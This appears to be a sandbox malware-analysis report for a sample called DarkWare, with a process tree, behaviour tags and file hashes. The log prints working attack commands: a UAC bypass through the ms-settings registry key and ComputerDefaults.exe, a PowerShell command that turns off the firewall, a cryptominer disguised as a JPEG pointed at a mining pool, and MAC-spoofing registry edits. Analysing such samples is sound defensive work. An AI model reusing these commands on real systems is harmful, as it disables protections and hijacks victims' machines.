C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\575174.vbs" /f5⤵
- Modifies registry class
PID:4436
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:4500
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:2820
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:4692
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\575174.vbs6⤵
- Checks computer location settings
PID:2616 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C attrib +h "C:\Windows\ntshrui.dll"7⤵
- Hide Artifacts: Hidden Files and Directories
PID:408 -
C:\Windows\system32\attrib.exeattrib +h "C:\Windows\ntshrui.dll"8⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:452
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\575174.vbs4⤵PID:3892
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:312
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:4136
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:3204
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:4048
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\711676.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:2100
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\711676.vbs" /f5⤵
- Modifies registry class
PID:4688
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:4420
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:2076
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:3988
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\711676.vbs6⤵
- Checks computer location settings
PID:1960 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0 >nul7⤵PID:3260
-
C:\Windows\system32\reg.exeREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 08⤵PID:868
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\711676.vbs4⤵PID:4008
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:1580
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:3416
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4996
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:2252
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\326390.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:4652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\326390.vbs" /f5⤵
- Modifies registry class
PID:2420
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:2496
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:4348
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:4792
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\326390.vbs6⤵
- Checks computer location settings
PID:2768 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False7⤵PID:3212
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\326390.vbs4⤵PID:3784
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:1652
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:4148
-
-
-
C:\Windows\system32\cmd.exe/c REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f >nul4⤵PID:4676
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f5⤵PID:3532
-
-
-
C:\ProgramData\CuteCats.jpegC:\ProgramData\CuteCats.jpeg -a kawpow -i 20 -o stratum+tcp://rvn.2miners.com:6060 -u RPUFwA26gSfphDcuv9hFe2LFLJxZcQzm8D.adraf -p x --api-bind-http 04⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:932 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" bios get serialnumber3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" baseboard get serialnumber3⤵
- System Location Discovery: System Language Discovery
PID:3192
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" diskdrive get serialnumber3⤵
- System Location Discovery: System Language Discovery
PID:1532
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\1.txt3⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:2428
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\41242e.txt3⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:3464
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4148 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\bet.rar2⤵
- Opens file in notepad (likely ransom note)
PID:456
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4336
-
C:\Windows\123r\UefiSpoof\UEFI DUMP\RAID 0 - CONFIG\winxsrcsv64.exe"C:\Windows\123r\UefiSpoof\UEFI DUMP\RAID 0 - CONFIG\winxsrcsv64.exe"1⤵PID:516
-
C:\Windows\123r\UefiSpoof\UEFI DUMP\NORMAL - CONFIG\winxsrcsv64.exe"C:\Windows\123r\UefiSpoof\UEFI DUMP\NORMAL - CONFIG\winxsrcsv64.exe"1⤵PID:2256
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\123r\UefiSpoof\Machanger DUMP\NetFixer.bat" "1⤵PID:2976
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]2⤵PID:3688
-
C:\Windows\System32\Wbem\WMIC.exewmic nic where physicaladapter=true get deviceid3⤵PID:1996
-
-
C:\Windows\system32\findstr.exefindstr [0-9]3⤵PID:4124
-
-
-
C:\Windows\system32\reg.exeREG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01"2⤵PID:3036
-
-
C:\Windows\system32\reg.exeREG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001"2⤵PID:4316
-
-
C:\Windows\system32\reg.exeREG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001"2⤵PID:4540
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001" /v NetworkAddress /t REG_SZ /d 02-29C29A22AAA /f2⤵PID:4484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]2⤵PID:316
-
C:\Windows\System32\Wbem\WMIC.exewmic nic where physicaladapter=true get deviceid3⤵PID:4080
-
-
C:\Windows\system32\findstr.exefindstr [0-9]3⤵PID:3556
-
-
-
C:\Windows\system32\reg.exeREG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01"2⤵PID:1900
-
-
C:\Windows\system32\reg.exeREG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001"2⤵PID:1572
-
-
C:\Windows\system32\reg.exeREG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001"2⤵PID:1492
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001" /v PnPCapabilities /t REG_DWORD /d 24 /f2⤵PID:3032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv"2⤵PID:1888
-
C:\Windows\System32\Wbem\WMIC.exewmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv3⤵PID:4440
-
-
-
C:\Windows\system32\netsh.exenetsh interface set interface name="Ethernet" disable2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\123r\UefiSpoof\Machanger DUMP\NetFixer.bat" "1⤵PID:4696
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]2⤵PID:5000
-
C:\Windows\System32\Wbem\WMIC.exewmic nic where physicaladapter=true get deviceid3⤵PID:1564
-
-
C:\Windows\system32\findstr.exefindstr [0-9]3⤵PID:4600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\123r\UefiSpoof\Machanger DUMP\NetFixer.bat" "1⤵PID:1020
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]2⤵PID:3640
-
C:\Windows\System32\Wbem\WMIC.exewmic nic where physicaladapter=true get deviceid3⤵PID:2020
-
-
C:\Windows\system32\findstr.exefindstr [0-9]3⤵PID:4720
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman1⤵PID:2764
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
38.3MB
MD540532ea36c2d4de56522ecf707bf289e
SHA186520c67e37b43366f965b63ba78070688bff83e
SHA25608e994aa4659a0fd4674d93ed9e683dff7c020013629e39d6ea73091f2bcd33b
SHA51241df9cc910afe6ffe7f92e1e26b607cf7fea18f52a746ca97d532406401035b5bb3ac5ebcb9bc659d4125cbf7262383aefc1f03a01886dc71e268b52ac2b43ce
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD5abb05838132e029516ef8de762d055c5
SHA186b275dabdd979da8efcc808dc0a487b245fbaa7
SHA256f766cf5096976c6b2726d6823bbc4ddb0d181256699de56502782f29bfaeeae0
SHA512e283ea82f7e70ece244e57b44244f14cc7d9552d59b1cfb9e0880161089cdc187b0c0c164099d65094f2691e4c9bc30dc004862303fcc44186ba6c1afadf415d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD523409eff866ede8e6f0e7a1f9252ccb3
SHA1b3ad4063f0d2bb669cbfa0a99700195c2f45a057
SHA25655a861d6258f313a138fd5dcd37d1ee83296f8eeb7215a7ddc47ab8c2fca04f1
SHA5120f42188345e71d154f3b78d858b2ac1a00c2d2b23c7938b6e905743cec2b7f2b9f5b5d7da49bf2644e551de73a17cc9cb6069edbd088bc5dd0266c8fbb3d189c
-
Filesize
138KB
MD56fe439b4f5cf20c00b987658efc382ab
SHA12828e90db93c67305bffaa2c073de74f04624bf8
SHA256463dd3b1a23e58e02389bc85d414c29a345e1f68ce083dcb97f9e969b99b3e81
SHA512c269f578b399921e5701c43a4f6ee25f23427e32782af4611f65ae42f4a823751ca8a296ccb383c17cc91c0d8d4975f5a85a4a368e8e424dfb2748051941befd
-
Filesize
125B
MD58b4ed5c47fdddbeba260ef11cfca88c6
SHA1868f11f8ed78ebe871f9da182d053f349834b017
SHA256170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA51287e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf
-
Filesize
163B
MD57f20048f8da6e42dfd6331bd96b8dd02
SHA190126e36609efec7cbeacae5dc8e001c71f14761
SHA2565dfd0b7798205499580908d5606fb0c9477ac5218549c3f8d4b5cefdebbd3ff8
SHA512adf540254f5d6b5c3881dfe2d4a801d9302adf8fbac2fbf2dfcc15542cb77ec311336c783b806631ad7f3d065e732889e0bf5dcd42eaff1c33de1c828f4d6cac
-
Filesize
120B
MD52a5c3c98c3398680dd3e4caaf4283721
SHA13a3a80594c3001c51769f92bdd9e9bc71474f1bb
SHA256054e4c4699aef7aae33a8fe1c758c75d7a351ffa9f6184e59093031bebf67e70
SHA5125722337a6128d60b8110f6e5ee6618453eae3ad54320bf27dc43a6ca333c0d8333df027647a588f8fa890cb6ec7e0921b2597216ea48c593c2c6c2008603d786
-
Filesize
165B
MD57801f742b26a38815fb6f778c367be47
SHA1bd3fa90f1828542e50080c96b9d961aa339970ca
SHA25641929fd8e25cc44c129ffd40152f42fc2726b3f5ab44d2bb6df1f4b9f16b4173
SHA512f2a0ccb6d3d418d1eea732a2b358a8feb55b03ce50aebac2a55254d21f594fd2500a45c9eb03faf85915075a85b5aaad1367ce6276bff62dd938c6e4061941b4
-
Filesize
217B
MD57b27754f38364499d2e3ca7545e595dd
SHA1fda34f6a52c365cc923c24efe91c1e5872fb35ca
SHA2564c9a72709d68a7a8de1c0671ef22b1418d738b593d6d4a2fec2db30858be9418
SHA51203e0c9807e62a462207eb7fdec44bb07b19c80753093777c99045c168f881feab4245bc874942bb7943a4219610e04e2a8a343b5922fdffaa68828d333670303
-
Filesize
1.9MB
MD52fe735b8323f0a8ad747737d3f3bc183
SHA14c42b0dc2fe774cb09eb1049897cb2f4205e318c
SHA2566d7a95d3cfd8acdf6e3fafbbe35130db3da4d7281918bce6eb226bc5488f91d5
SHA512022fac37dab002298231c9288c08ed13d812a1ac93c07064d386b539ac6141b39439dec676f70e3677fb89b6482f2ee475d19c67f90b634d5fa06e806f1fd17a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
230KB
MD5f08723bcb5c94651b8df18a3ad027460
SHA1e9f855543aab8f383a34d6a738889034daa6b5a3
SHA256b8ca9e14e7adaa62220329b33138336146a2b3188215fcbd38365efc2f756460
SHA5123f647c85345e08d533d15a3fab7394da3caff2b4fdbaaa83946321312f3f17d5cba018309d4b2206f083f9fd90f568c27399932c2ae5ae79200a05d6dd0da589
-
Filesize
1KB
MD5ab004cfd8a568394d9c9429c59e986f8
SHA175f13c82e47cff9dc0810ea0d306eca98aad9aa2
SHA2564e40792f84b98507a8ef4fd0f507fe49f6b1588ca3f8cbca01cf117f2b184a25
SHA512a0777e101d313f93d1d458c41776f217df36cba83d9a9ff8a9a7e860b1361e1a023dc1cbab54d98acd803972dca58f56b4d5c530d244b3b40dcf868a9984a318
-
Filesize
633B
MD52caac01cb42d7ec03571d732341c8439
SHA17191425f060d91b46c0f9732d244802f936518c5
SHA2562c68a0b7b59824a65de7c9cc76b439d3a19dfca1e9efd9e569c3dec171b2074f
SHA512d71438fa9eff5483c4a8f42e72be8b019033a0439e640fcb7c24e6fb6dac8a5228d9b75bc18f0e48f0928e64a3c686801f1485a0fcfc8a336417a98da78fb94a
-
Filesize
6.2MB
MD563fdb27f95a06bb02becbe91be82c314
SHA14839ee3ed25c9daf2f6261fcaec4233944f19aab
SHA2564dc9081a8ca2deb66fc560747eb1e5fd7f87b49a19064e52e59aafa316495479
SHA512acff30fae59f59902c89c866c3aa7195604f9b610ae33186196adc3b40148ddd3bf96c66047c1f1da785562f4e4d537ca6a30b1156f23ac5261037e31592727b